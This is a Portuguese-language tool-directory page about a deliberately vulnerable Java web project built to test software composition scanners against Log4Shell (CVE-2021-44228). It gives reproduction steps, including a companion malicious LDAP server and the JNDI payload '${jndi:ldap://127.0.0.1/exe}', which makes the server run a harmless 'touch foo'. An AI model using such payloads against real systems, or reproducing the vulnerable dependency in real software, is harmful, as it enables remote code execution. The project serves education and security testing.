Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
l4j-tp1 — projeto web JEE com vulnerabilidade log4shell (CVE-2021-44228) | Kitploit
Ferramentas/GitHubGitHub/scabench/l4j-tp1
Análise de VulnerabilidadesExploraçãoSegurança WebSegurança da Cadeia de SuprimentosAprendizado e EducaçãoLabs e Prática
GitHubscabench/l4j-tp1

l4j-tp1

projeto web JEE com vulnerabilidade log4shell (CVE-2021-44228)

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

log4shell verdadeiro positivo

Este é um projeto web simples com uma vulnerabilidade log4shell. O projeto define um serviço get simples scabench.HelloWorldService que retorna uma string de texto simples hello world. O serviço não espera parâmetros e, se parâmetros forem encontrados, um erro é registado.

A dependência vulnerável é org.apache.logging.log4j:log4j-core:2.14.1, a vulnerabilidade é CVE-2021-44228.

Demonstrando a Vulnerabilidade usando um Teste

Isto requer unix ou macos. É fácil portar este projeto para windows.

Um teste unitário é fornecido para demonstrar a vulnerabilidade. O teste requer um servidor ldap que forneça código vulnerável; o executável correspondente é fornecido pelo projeto e está definido em um projeto separado https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept baseado em https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept. A fixture de teste tratará da inicialização e do encerramento do servidor ldap.

O teste criará um ficheiro foo com base em um comando codificado embutido no código do servidor ldap ao qual o log4j se conecta (touch foo). Este servidor pode ser controlado por um atacante.

Para executar o teste, construa o projeto com mvn test.

Demonstrando a Vulnerabilidade executando a Aplicação

  1. inicie o servidor web embutido: mvn jetty:run
  2. inicie o servidor ldap incluído: java -jar dodgy-ldap-server.jar (o código vulnerável fará o download do código Java deste servidor)
  3. aponte o navegador para http://localhost:8080/; este site contém um formulário pré-preenchido com um payload malicioso ${jndi:ldap://127.0.0.1/exe}
  4. envie este formulário
  5. isso criará um ficheiro foo no servidor

Executando Análises de Composição de Software

Existem vários scripts sh para executar diferentes análises; os relatórios de resultados podem ser encontrados em scan-results.

Gerando o SBOM

O pom.xml tem um plugin para gerar um SBOM no formato CycloneDX. Para fazer isso, execute mvn cyclonedx:makePackageBom; o SBOM pode ser encontrado em target/ nos formatos json e xml.

Baixar ferramenta